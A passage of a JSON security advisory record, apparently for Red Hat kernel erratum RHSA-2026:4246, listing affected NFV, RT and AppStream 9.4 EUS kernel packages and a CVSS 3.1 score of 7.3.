"NFV-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
],
"restart_required": {
"category": "machine"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4246"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
